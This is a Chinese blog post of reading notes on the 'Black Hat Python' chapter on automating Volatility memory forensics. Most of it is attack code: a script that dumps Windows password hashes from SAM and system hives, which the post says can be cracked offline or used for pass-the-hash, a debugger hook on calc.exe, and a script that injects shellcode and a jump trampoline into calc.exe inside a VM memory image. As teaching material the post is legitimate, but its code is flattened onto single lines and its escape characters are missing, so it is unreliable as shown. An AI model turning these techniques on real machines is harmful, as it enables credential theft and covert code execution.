自动化攻击取证

admin 2025年1月12日00:27:04评论6 views字数 4666阅读15分33秒阅读模式

自动化攻击取证

前言

《Python黑帽子:黑客与渗透测试编程之道》的读书笔记,会包括书中源码,并自己将其中一些改写成Python3版本。书是比较老了,anyway,还是本很好的书

本篇是第11章自动化攻击取证,主要是调用Volatility

1、Volatility配置

在code.google.com/p/volatility/downloads/list安装

运行python vol.py imageinfo -f "memorydump.img"来获取目标配置

最重要的信息如下:

自动化攻击取证

然后运行python vol.py plugin --profile="WinXPSP2x86" arguments

2、抓取口令的哈希值

导出口令的哈希值可以用于离线破解,也可以直接用来进行认证仿冒攻击

  • 运行Volatility的hivelist插件定位注册表SAM和system在内存中的偏移:python vol.py hivelist --profile=WinXPSP2x86 -f "WindowsXPSP2.vmem

  • 在获得了注册表的虚拟地址,即偏移后:python vol.py hashdump -d --profile=WinXPSP2x86 -f "WindowsXPSP2.vmem -y system偏移地址 -s Sam偏移地址

做成脚本

#!usr/bin/env python#-*- coding:utf8 -*-  import sysimport structimport volatility.conf as confimport volatility.registry as registry# 要分析的内存文件位置memory_file = "D:\Windows XP Professional-f6b49762.vmem"# volatility的下载的路径sys.path.append("D:\volatility-2.3")registry.PluginImporter()config = conf.ConfObject()import volatility.commands as commandsimport volatility.addrspace as addrspaceconfig.parse_options()config.PROFILE = "WinXPSP3x86"config.LOCATION = "file://%s" % memory_file# 注册全局参数registry.register_global_options(config, commands.Command)registry.register_global_options(config, addrspace.BaseAddressSpace)from volatility.plugins.registry.registryapi import RegistryApifrom volatility.plugins.registry.lsadump import HashDump# 实例化一个RegistryApi类对象(包含常用的注册表帮助类)registry = RegistryApi(config)# 等同与hivelist命令registry.populate_offsets()sam_offset = Nonesys_offset = None# 循环检索SAM和system键值for offset in registry.all_offsets:    if registry.all_offsets[offset].endswith("\SAM"):        sam_offset = offset        print "[*] SAM: 0x%08x" % offset    if registry.all_offsets[offset].endswith("\system"):        sys_offset = offset        print "[*] System: 0x%08x" % offset    if sam_offset is not None and sys_offset is not None:        config.sys_offset = sys_offset        config.sam_offset = sam_offset        # 创建HashDump对象        hashdump = HashDump(config)        for hash in hashdump.calculate():            print hash        breakif sam_offset is None or sys_offset is None:    print "[*] Failed to find the system or SAM offsets."

3、直接代码注入

以计算器为例

#!usr/bin/env python#-*- coding:utf8 -*-  from immlib import *class cc_hook(LogBpHook):    def __init__(self):        LogBpHook.__init__(self)        self.imm = Debugger()    def run(self, regs):        self.imm.log("%08x" % regs['EIP'], regs['EIP'])        self.imm.deleteBreakpoint(regs['EIP'])        returndef main(args):    imm = Debugger()    calc = imm.getModule("calc.exe")    imm.analyseCode(calc.getCodebase())    functions = imm.getAllFunctions(calc.getCodebase())    hooker = cc_hook()    for function in functions:        hooker.add("%08x" % function, function)    return "Tracking %d functions." % len(functions)

4、插入shellcode

即最终

#!usr/bin/env python#-*- coding:utf8 -*-  import sysimport structequals_button = 0x01005D51# 要分析的内存文件位置memory_file = "D:\Windows XP Professional-f6b49762.vmem"slack_space = Nonetrampoline_offset = None# 读入我们的shellcodesc_fd = open("cmeasure.bin", "rb")sc = sc_fd.read()sc_fd.close()sys.path.append("D:\volatility-2.3")import volatility.conf as confimport volatility.registry as registryregistry.PluginImporter()config = conf.ConfObject()import volatility.commands as commandsimport volatility.addrspace as addrspaceregistry.register_global_options(config, commands.Command)registry.register_global_options(config, addrspace.BaseAddressSpace)config.parse_options()config.PROFILE = "WinXPSP3x86"config.LOCATION = "file://%s" % memory_fileimport volatility.plugins.taskmods as taskmodsp = taskmods.PSList(config)for process in p.calculate():    if str(process.ImageFileName) == "calc.exe":        print "[*] Found calc.exe with PID %d" % process.UniqueProcessId        print "[*] Hunting for physical offsets...please wait."        address_space = process.get_process_address_space()        pages = address_space.get_available_pages()        # page[0]:页面地址        # page[1]:页面大小        for page in pages:            physical = address_space.vtop(page[0])            if physical is not None:                fd = open(memory_file, "r+")                fd.seek(physical)                buf = fd.read(page[1])                try:                    offset = buf.index("x00" * len(sc))                    slack_space = page[0] + offset                    print "[*] Found good shellcode location!"                    print "[*] Virtual address: 0x%08x" % slack_space                    print "[*] Physical address: 0x%08x" % (physical + offset)                    print "[*] Injecting shellcode."                    fd.seek(physical + offset)                    fd.write(sc)                    fd.flush()                    # 创建我们的跳转代码                    # 对应的汇编指令为:                    # mov ebx, ADDRESS_OF_SHELLCODE( shellcode地址)                    # jmp ebx                    tramp = "xbb%s" % struct.pack("<L", page[0] + offset)                    tramp += "xffxe3"                    if trampoline_offset is not None:                        break                except:                    pass                fd.close()            # 查看目标代码的位置            if page[0] <= equals_button and equals_button < (page[0] + page[1] -7):                print "[*] Found our trampoline target at: 0x%08x" % (physical)                # 计算虚拟偏移                v_offset = equals_button - page[0]                # 计算物理偏移                trampoline_offset = physical+ v_offset                print "[*] Found our trampoline target at: 0x%08x" % (trampoline_offset)                if slack_space is not None:                    break        print "[*] Writing trampoline..."        fd = open(memory_file, "r+")        fd.seek(trampoline_offset)        fd.write(tramp)        fd.close()        print "[*] Done injecting code."

结语

回头去看看vol

红客突击队于2019年由队长k龙牵头,联合国内多位顶尖高校研究生成立。其团队从成立至今多次参加国际网络安全竞赛并取得良好成绩,积累了丰富的竞赛经验。团队现有三十多位正式成员及若干预备人员,下属联合分队数支。红客突击队始终秉承先做人后技术的宗旨,旨在打造国际顶尖网络安全团队。

原文始发于微信公众号(红客突击队):自动化攻击取证

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年1月12日00:27:04
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   自动化攻击取证https://cn-sec.com/archives/1114623.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息